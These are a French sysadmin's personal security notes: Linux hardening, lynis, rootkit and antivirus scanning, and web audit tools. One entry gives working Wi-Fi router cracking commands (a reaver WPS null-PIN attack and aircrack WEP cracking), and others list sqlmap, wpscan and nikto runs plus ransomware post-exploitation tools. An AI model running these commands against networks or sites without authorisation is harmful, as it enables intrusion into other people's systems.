pense-bête de bruno sanchiz

lynis

bruno — 2025-10-28T20:28:53Z

Installation

sudo apt-get install lynis

Exemple d'utilisation

sudo lynis audit system
Voir aussi "sécurité" informatique sous linux

Lecture du résultat

Le préfixe (KRNL, SSH, PKGS, etc.) indique la catégorie ou le composant concerné :

KRNL = Kernel (noyau du système)
SSH = Secure Shell (accès à distance sécurisé)
PKGS = Packages (gestion de paquets/applications)
DEB = Debian (spécifique à Debian ou Ubuntu)
AUTH = Authentication (authentification)
FILE = File System (système de fichiers)

Lire le résultat pour choisir ce qu'il faut faire

URGENTS : cat /var/log/lynis.log |grep Warning
A FAIRE : sudo cat /var/log/lynis.log |grep Suggestion

sécurités informatiques

bruno — 2024-04-11T10:57:06Z

réseaux sociaux / messageries instantanées

extinction rebellion (xr)

https://extinctionrebellion.fr/ressources/

Protection des données personnelles informatiques

Comment verrouiller son téléphone

Manuel de sécurité informatique

nothing to hide et matrix.de

protéger l'information
framateam

quelle messagerie sécurisée choisir

sécurité de son site internet

bruno — 2023-05-05T01:06:22Z

tests automatiques de sites webs et de trous de sécurité
sudo apt-get install nikto sqlmap whatweb wig wapiti testssl.sh nmap curl bind9-dnsutils

test de site wordpress (kali)

wpscan --update && wpscan --url DOMAIN.COM -e p,vt,u

outil d'audit de la sécurité des serveurs Web.

Il est conçu pour rechercher divers fichiers, configurations et programmes par défaut et non sécurisés sur des serveurs Web de tout type.
apt-get install nikto
nikto -h https://DOMAIN.COM

vulnérabilité d'injection SQL

apt-get install sqlmap
sqlmap -u https://DOMAIN.COM --level=0 à 6

découvrir les technologies web d'un site web

apt-get install whatweb

whatweb https://DOMAIN.COM

informations sur les applications Web

apt-get install wig
wig https://DOMAIN.COM
wapiti - A web application vulnerability scanner in Python
wapiti -u https://DOMAIN.COM

Vérification de la configuration du certificat SSL

sudo apt-get install testssl.sh
testssl SITE.COM

trouver des ports ouverts

apt-get install nmap
nmap SITE.COM

afficher les en-têtes HTTP

apt-get install curl
Les en-têtes HTTP peuvent contenir des informations sur la redirection, le serveur, etc. Vous pouvez afficher les en-têtes HTTP avec la commande suivante :
curl -I SITE.COM

trouver l'adresse IP du site

apt-get install bind9-dnsutils
dig SITE.COM +short

connaître tous les enregistrements DNS du site

dig SITE.COM ANY

non essayés :

forensics-all

https://fr.linux-console.net/?p=8495
https://www.tutorialspoint.com/kali_linux/kali_linux_website_penetration_testing.htm

box crackable et solution

bruno — 2017-08-15T00:43:34Z

http://www.crack-wifi.com/forum/topic-12166-0day-crack-box-sfr-nb6v-en-deux-secondes-par-pin-null.html :

installation : sudo apt-get install libpcap0.8-dev git clone https://github.com/t6x/reaver-wps-fork-t6x.git cd reaver* && cd src && ./configure && sudo make install Ce qui donne : install -D -m 755 wash /usr/local/bin/wash install -D -m 755 reaver /usr/local/bin/reaver install -d /usr/local/var/lib/reaver
utilisation sur une mac 24:95:04... :
- commencer par éventuellement sudo airmon-ng un sudo airmon-ng start wlan0 puis sudo airmon-ng check kill
- wash -i mon2 ou airodump-ng --write tuto mon0qui donne plus

- sudo reaver -i wlan0 -b 24:95:04... -p "" -vv -c 6
- code informatif : # wash -i wlan0 -j -c 9
- # wash -i wlan0 -s

rappel avec aircrack ( clé wep )
sudo airmon-ng

Interface	Chipset Driver wlan1 Ralink 2573 USB	rt73usb - [phy7]

sudo airmon-ng start wlan1

Interface	Chipset Driver wlan1 Ralink 2573 USB	rt73usb - [phy7] (monitor mode enabled on mon0)

sudo airodump-ng --write tuto mon0va créer des fichiers tuto-[0-9]*.cap tuto-[0-9]*.csv tuto-[0-9]*.kismet.csv tuto-[0-9]*.netxml

On peut alors préciser channel, BSSID :
channel=1;BSSID="C2:5E:2F:26:AA:BC"; et airodump-ng --write tuto --channel $channel --bssid $BSSID mon0

On peut alors préciser channel, BSSID, ESSID, STATION :
STATION="00:13:02:97:C7:B5"; ESSID="freeboxvieuxpalais";channel=1;BSSID="C2:5E:2F:26:AA:BC"; sudo aireplay-ng -3 -e $ESSID -b $BSSID -h $STATION mon0

puis
aircrack-ng -z tuto01.cap

"sécurité" informatique sous linux

bruno — 2017-07-03T01:24:33Z

Installer les programmes suivants pour renforcer :

sudo apt-get install libpam-tmpdir apt-listbugs apt-listchanges needrestart

Sous linux on peut utiliser les programmes suivants :

wapiti

wapiti - analyseur de vulnérabilités d'application web
wapiti -u http://pascale.landais.free.fr

rkhunter

installation : apt-get install rkhunter
utilisation : rkhunter --propupd && rkhunter -c et pour plus de précisions après le test : grep "Warning" /var/log/rkhunter.log
résultats :
- Warnings de type hidden files à vérifier un par un
- PermitRootLogin : PermitRootLogin without-password avec UsePAM yes dans /etc/ssh/sshd_config semble normal

chkrootkit

installation : apt-get install chkrootkit et pour un test chaque jour sed 's/RUN_DAILY="false"/RUN_DAILY="true"/' -i /etc/chkrootkit.conf
utilisation : chkrootkit
résultats :
- The following suspicious files and directories were found : beaucoup de fichiers commençant par "." pas nécessairement un problème.
- Checking chkutmp'... The tty of the following user process(es) were not found in /var/run/utmp ! ! RUID PID TTY CMD ! root 3332 tty7 /usr/bin/X :0 -seat seat0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch
  chkutmp : nothing deleted. Les commandes ``w readlink -f /proc/3332/exeet readlink -f /usr/bin/X

lynis

Voir aussi lynis
apt-get install lynis
lynis audit system

Voir en particulier les suggestions : installer les paquets proposés

par exemple : apt-get install debian-goodies libapache2-mod-evasive libapache2-mod-qos libapache2-modsecurity

Default umask in /etc/login.defs /etc/init.d/rc could be more strict like 027

echo lynix; apt-get install libpam-tmpdir apt-listbugs apt-listchanges needrestart debsecan debsums chmod o-rwx /etc/sudoers.d chmod -R o-rwx /home/* cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local sed 's/#\(\* *soft *core *0\)/\1/' -i /etc/security/limits.conf # core dumps https://cisofy.com/lynis/controls/KRNL-5820/ sed "s/^\(UMASK[\t ]*\)022/\1027/" -i /etc/login.defs # Default umask in /etc/login.defs could be more strict like 027 [AUTH-9328] https://cisofy.com/lynis/controls/AUTH-9328/ apt-get install sysstat #Enable sysstat to collect accounting (no results) [ACCT-9626] https://cisofy.com/lynis/controls/ACCT-9626/ apt-get install auditd #Enable auditd to collect audit information [ACCT-9628] https://cisofy.com/lynis/controls/ACCT-9628/ apt-get install tripwire samhain # Install a file integrity tool to monitor changes to critical and sensitive files [FINT-4350] https://cisofy.com/lynis/controls/FINT-4350/ apt-get install puppet #Determine if automation tools are present for system management [TOOL-5002] https://cisofy.com/lynis/controls/TOOL-5002/

les bugs/CVE/vulnérabilité/

https://security-tracker.debian.org/tracker/
https://www.cvedetails.com/vulnerability-list/vendor_id-358/Webmin.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2025-39735

logiciels

https://hackingvision.com/category/hacking-tools/
metasploit

logiciels rançongiciels d'après CERTFR-2021-CTI-001.pdf

mimikatz
- https://www.varonis.com/fr/blog/mimikatz-kezako

La phase de post-exploitation d'une attaque par rançongiciel se déroule généralement de la manière suivante [35] :
• pour élever leurs privilèges au sein du SI, les attaquants peuvent :
– procéder à des attaques par force brute ;
– exploiter des vulnérabilités logicielles, par exemple du type ZeroLogon (cas de Ryuk [29]) ou d'autres
types de CVE ;
– utiliser des outils de tests d'intrusion tels que Mimikatz, Mimidogs, Mimikittenz [36], Windows Credentials editor, Rubeus [37] et LaZagne [16], afin de récupérer des identifiants légitimes.
• pour effectuer la cartographie de l'Active Directory (AD), les attaquants utilisent généralement les outils de
tests d'intrusion BloodHound, SharpHound ou ADFind [38].
• pour se latéraliser, les attaquants peuvent utiliser les outils de tests d'intrusion Cobalt Strike, Metasploit,
Powershell Empire, Koadic ou encore CrackMapExec (cas par exemple de LockBit [39]) mais aussi utiliser
abusivement des outils Windows tels que WMI [35], WinRM [16] et PsExec [35].
• pour déployer le rançongiciel, les attaquants utilisent par exemple un loader, PsExec [16] ou encore des tâches
planifiées déployées par GPO (Group Policy Objects).

sites

https://www.ssi.gouv.fr/particulier/logiciels-preconises-par-lanssi-2/
https://docs.clip-os.org/
https://www.cvedetails.com/
https://security-tracker.debian.org/tracker/CVE-2024-3094
outils de décryptage : https://www.nomoreransom.org/en/decryption-tools.html

se prémunir contre virus, trojan ...

bruno — 2017-03-18T00:07:51Z

Rien n'est évident ici.
Certains programmes à installer feront le boulot tout seul :
installer fail2ban - bannit des hôtes qui provoquent plusieurs erreurs d'authentification

antivirus, utile pour vérifier des windobe : clamav clamav-freshclam

freshclam && clamscan -r -i -v DOSSIERouFICHIER

integrit - Vérificateur de l'intégrité des fichiers
chkrootkit - Détecteur de rootkit
rkhunter - scanner de rootkit, porte dérobée, renifleur et exploit

antivirus :

https://www.av-test.org/fr/nouvelles/news-single-view/linux-test-de-16-suites-de-protection-contre-les-programmes-malveillants-specifiques-a-windows-e/ :
AVG Server Edition for Linux 2013 et ESET NOD32 AV for Linux Desktop

programmes obsolètes

http://cert.ssi.gouv.fr/site/CERTA-2005-INF-003/index.html

certificats https

http://www.cert.ssi.gouv.fr/site/CERTFR-2015-ACT-004/index.html

recommandations mots de passe

http://cert.ssi.gouv.fr/site/CERTA-2005-INF-001/index.html

comment télécharger un programme

la méthode windows ne doit pas être utilisée sur linux : toujours préférer apt-get ou synaptic ou l'équivalent, déjà présent sur votre ordinateur.
sur windows , peu de sites sont sures : ublock doit être installé sur votre firefox, il vous aidera à faire le tri.
- liste non exhaustive de sites dangereux d'après ublock/emisoft (http://blog.emsisoft.com/2015/03/11/mind-the-pup-top-download-portals-to-avoid/ , https://www.howtogeek.com/207692/yes-every-freeware-download-site-is-serving-crapware-heres-the-proof/ ) car ces sites téléchargent des virus/malware en plus du programme voulu : Download.com, Filehippo, Snapfiles, Softonic, Softpedia, Tucows, SourceForge, Filehorse, Software Informer, Soft32
- par la suite il faudra essayer comme site http://www.majorgeeks.com/